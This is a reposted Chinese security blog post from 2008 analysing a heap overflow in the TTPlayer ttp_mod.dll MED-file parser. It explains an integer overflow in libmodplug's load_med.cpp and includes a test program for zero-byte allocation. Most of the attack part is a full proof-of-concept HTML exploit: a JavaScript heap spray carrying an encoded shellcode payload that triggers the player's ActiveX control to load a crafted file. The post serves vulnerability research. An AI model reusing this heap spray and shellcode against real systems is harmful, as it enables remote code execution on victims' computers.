本文共 3336 字,大约阅读时间需要 11 分钟。
导读:千千静听ttp_mod.dll解析med文件堆溢出的利用分析
---------------------------------------------------------------------------Author: void[at]ph4nt0m[dot]org Blog: Date: 2008-03-31这个洞是dummy牛发现的,当时我只是看了有问题的源码就觉得最多DoS,没有去实际测试分析,惭愧.没想到dummy牛利用成功.这里事后分析一下:-)
千千静听ttp_mod.dll用的是开源代码,源代码链接:
出问题的源代码是gst-plugins-0.8.3/gst/modplug/libmodplug/load_med.cpp里的:
698 // Song Comments
699 UINT annotxt = bswapBE32(pmex->annotxt);700 UINT annolen = bswapBE32(pmex->annolen);701 if ((annotxt) && (annolen) && (annotxt+annolen <= dwMemLength))702 { 703 m_lpszSongComments = new char[annolen+1];704 memcpy(m_lpszSongComments, lpStream+annotxt, annolen);705 m_lpszSongComments[annolen] = 0;706 }这是个很典型的整数溢出.annolen为0xFFFFFFFF(即有符号整数-1)时,导致703行new char[0],有趣的是这个0字节分配居然成功返回(测试见注[1]),所以即使703行后加上类似if(m_lpszSongComments){...}的检查代码,也无济于事.
除了这个load_med.cpp有问题外,这个源码包好几处都存在类似问题,有兴趣的可以看看.
注释:注[1]: malloc(0)的行为: 关于new char[0]堆分配的测试代码:---[Cut Below]------------------------------------------------------------------------
#include void main() { int len=0, i=0; char* p; len = -1; p = new char[len]; printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);len = 0;
p = new char[len];printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);while(1){ p[i++] = 'A';}}---[Cut Above]------------------------------------------------------------------------注[2]:
poc.html代码---[Cut Below]------------------------------------------------------------------------
<script >var heapSprayToAddress = 0x0c0c0c0c;var shellcode = unescape("%u0eeb%u4b5b%uc933%uc6b1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe5d%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%ubd16%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufed0%ufefe%u96ac%u8c91%ufe99%u9a96%u8a91%u96a3%uce8a%ua593%u8e96%uca96%u9690%u9fa5%ua38a%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u01a6%u0101%u8acc%uf26f%u779d%ub12f%uf494%ue0c6%u2244%u3845%u44d2%u4f22%u3f57%udf58%u00fe");var heapBlockSize = 0x100000;var payLoadSize = shellcode.length * 2;var spraySlideSize = heapBlockSize - (payLoadSize+0x38);var spraySlide = unescape("%u0c0c%u0c0c");spraySlide = getSpraySlide(spraySlide,spraySlideSize);heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;memory = new Array();for (i=0;i { memory[i] = spraySlide + shellcode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2 { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } //ttp.URL="c://test.mod"; //ttp.URL=" "; //ttp.controls.play(); setTimeout('ttp.URL="c:/test.mod";ttp.controls.play();',1000); //setTimeout('ttp.openURL(" ); </script> ---[Cut Above]------------------------------------------------------------------------ 本文转自转载地址:http://jjiob.baihongyu.com/